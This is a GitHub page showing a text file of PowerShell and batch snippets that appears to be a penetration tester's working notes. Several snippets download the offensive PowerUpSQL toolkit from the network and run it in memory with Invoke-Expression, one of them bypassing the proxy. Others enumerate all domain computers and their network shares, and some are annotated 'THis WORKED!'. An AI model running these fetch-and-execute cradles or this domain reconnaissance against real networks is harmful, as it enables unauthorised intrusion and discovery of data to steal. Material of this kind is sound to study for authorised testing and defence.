Repository navigation
Expand file tree
/
Copy pathCommands.txt
More file actions
289 lines (205 loc) · 9.28 KB
/
Copy pathCommands.txt
File metadata and controls
289 lines (205 loc) · 9.28 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
$url = "https://raw.githubusercontent.com/NetSPI/PowerUpSQL/refs/heads/master/PowerUpSQL.ps1"
$request = [System.Net.HttpWebRequest]::Create($url)
$request.Method = "GET"
$response = $request.GetResponse()
$reader = New-Object IO.StreamReader $response.GetResponseStream()
$scriptContent = $reader.ReadToEnd()
$reader.Close()
Invoke-Expression $scriptContent
$url = "https://raw.githubusercontent.com/NetSPI/PowerUpSQL/refs/heads/master/PowerUpSQL.ps1"
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()
$scriptBytes = $wc.DownloadData($url)
$scriptContent = [System.Text.Encoding]::UTF8.GetString($scriptBytes)
Invoke-Expression $scriptContent
@echo off
setlocal
:: Get the list of domain computers and save it to a file
net group "domain computers" /domain > computers.txt
:: Filter only computer names (ignores headers and footers in the output)
for /f "tokens=1 delims=" %%A in ('findstr /R /C:"\\\\" computers.txt') do (
echo Enumerating shares on %%A
:: Run net view to list shared resources on each computer
net view %%A >> shares.txt 2>&1
)
:: Clean up temporary files
del computers.txt
echo Network share enumeration completed. Check shares.txt for results.
$url = "https://raw.githubusercontent.com/NetSPI/PowerUpSQL/refs/heads/master/PowerUpSQL.ps1"
$request = [System.Net.WebRequest]::Create($url)
$request.Method = "GET"
$response = $request.GetResponse()
$stream = $response.GetResponseStream()
$reader = New-Object System.IO.StreamReader($stream)
$scriptContent = $reader.ReadToEnd()
$reader.Close()
Invoke-Expression $scriptContent
@echo off
setlocal
:: Get the list of domain computers and save it to a file
net group "domain computers" /domain > computers_raw.txt
:: Filter only computer names and save to another file (ignoring headers/footers)
findstr /R /C:"\\\\" computers_raw.txt > computers.txt
del computers_raw.txt
:: Create or clear output files
echo Network share enumeration results: > shares.txt
echo Unreachable computers: > unreachable.txt
:: Loop through each computer name and check its online status before enumerating
for /f "tokens=1 delims=" %%A in (computers.txt) do (
echo Checking %%A ...
:: Ping to check if the computer is online
ping -n 1 %%A | find "TTL=" >nul
if %errorlevel% equ 0 (
echo Enumerating shares on %%A ...
net view %%A >> shares.txt 2>&1
) else (
echo %%A is unreachable. >> unreachable.txt
)
)
:: Clean up temporary file
del computers.txt
echo Network share enumeration completed.
echo Check shares.txt for successful enumerations and unreachable.txt for errors.
---------------------------------------------------------------------------------
# Run the command and capture the output
$computers = net group "domain computers" /domain
# Filter only the computer names (ignoring headers and footers) and format them line-by-line
$computers | ForEach-Object {
if ($_ -match "\\\\") { $_.Trim() }
} | Out-File -FilePath "computers_list.txt"
Write-Output "Computer names have been saved line-by-line in computers_list.txt"
---------------------------------------------------------------------------------
# Run the command and capture the output
$computers = net group "domain computers" /domain
# Initialize an array to store the filtered computer names
$computerNames = @()
# Loop through each line and check if it contains a computer name
$startAdding = $false
foreach ($line in $computers) {
# Skip the header until we find actual computer entries
if ($line -match "^-+$") {
$startAdding = $true
continue
}
# Stop adding when we hit the footer
if ($line -match "The command completed successfully.") { break }
# If we are in the section with computer names, add them to the array
if ($startAdding -and $line.Trim() -ne "") {
$computerNames += $line.Trim()
}
}
# Output the result to a file, each computer on a new line
$computerNames | Out-File -FilePath "computers_list.txt"
Write-Output "Computer names have been saved line-by-line in computers_list.txt"
THis WORKED! - Oct -28-2024 ---------------------------------------------------------------------------------
# Run the command and capture the output
$computers = net group "domain computers" /domain
# Initialize an array to store the formatted computer names
$computerNames = @()
# Loop through each line and extract individual computer names
$startAdding = $false
foreach ($line in $computers) {
# Start adding after finding the dashed separator line
if ($line -match "^-+$") {
$startAdding = $true
continue
}
# Stop adding at the footer line
if ($line -match "The command completed successfully.") { break }
# If we are in the computer names section, split each line by whitespace and add each name individually
if ($startAdding -and $line.Trim() -ne "") {
$line.Split(" ", [System.StringSplitOptions]::RemoveEmptyEntries) | ForEach-Object {
$computerNames += $_
}
}
}
# Output the result to a file, each computer on a new line
$computerNames | Out-File -FilePath "computers_list.txt"
Write-Output "Computer names have been saved line-by-line in computers_list.txt"
THis WORKED! - Oct -28-2024 ---------------------------------------------------------------------------------
# Specify the path to the file with the list of computers
$computerListPath = "computers_list.txt"
# Check if the file exists
if (-Not (Test-Path -Path $computerListPath)) {
Write-Output "Computer list file not found at $computerListPath"
exit
}
# Output file for network shares
$outputFile = "network_shares.txt"
$unreachableFile = "unreachable_computers.txt"
# Clear previous results, if any
Clear-Content -Path $outputFile -ErrorAction SilentlyContinue
Clear-Content -Path $unreachableFile -ErrorAction SilentlyContinue
# Loop through each computer in the list
foreach ($computer in Get-Content -Path $computerListPath) {
Write-Output "Checking $computer..."
# Test if the computer is reachable
if (Test-Connection -ComputerName $computer -Count 1 -Quiet) {
Write-Output "Enumerating shares on $computer..."
# Enumerate shares using Get-WmiObject
try {
$shares = Get-WmiObject -Class Win32_Share -ComputerName $computer -ErrorAction Stop
if ($shares) {
# Append results to the output file
Add-Content -Path $outputFile -Value "Shares on $computer:"
foreach ($share in $shares) {
Add-Content -Path $outputFile -Value " Share Name: $($share.Name), Path: $($share.Path)"
}
Add-Content -Path $outputFile -Value "-----------------------------------"
} else {
Add-Content -Path $outputFile -Value "No shares found on $computer"
}
} catch {
# Log any errors (e.g., access denied) to the output file
Add-Content -Path $outputFile -Value "Error accessing shares on $computer: $_"
}
} else {
Write-Output "$computer is unreachable."
Add-Content -Path $unreachableFile -Value $computer
}
}
Write-Output "Network share enumeration completed."
Write-Output "Results are saved in $outputFile. Unreachable computers are listed in $unreachableFile."
# Path to the file with the list of computers
$computerListPath = "computers_list.txt"
# Check if the file exists
if (-Not (Test-Path -Path $computerListPath)) {
Write-Output "Computer list file not found at $computerListPath"
exit
}
# Output file for network shares
$outputFile = "network_shares.txt"
$unreachableFile = "unreachable_computers.txt"
# Clear previous results, if any
Clear-Content -Path $outputFile -ErrorAction SilentlyContinue
Clear-Content -Path $unreachableFile -ErrorAction SilentlyContinue
# Loop through each computer in the list
foreach ($computer in Get-Content -Path $computerListPath) {
Write-Output "Checking $computer..."
# Test if the computer is reachable
if (Test-Connection -ComputerName $computer -Count 1 -Quiet) {
Write-Output "Enumerating shares on $computer..."
# Run net view command and capture the output
try {
$shares = net view \\$computer 2>&1
if ($shares -match "shared resources") {
Add-Content -Path $outputFile -Value "Shares on $computer:"
Add-Content -Path $outputFile -Value $shares
Add-Content -Path $outputFile -Value "-----------------------------------"
} else {
# If no shares are found or there's an access issue, log it
Add-Content -Path $outputFile -Value "No shares found or access denied on $computer"
Add-Content -Path $outputFile -Value "-----------------------------------"
}
} catch {
# Log any unexpected errors
Add-Content -Path $outputFile -Value "Error accessing shares on $computer: $_"
Add-Content -Path $outputFile -Value "-----------------------------------"
}
} else {
Write-Output "$computer is unreachable."
Add-Content -Path $unreachableFile -Value $computer
}
}
Write-Output "Network share enumeration completed."
Write-Output "Results are saved in $outputFile. Unreachable computers are listed in $unreachableFile."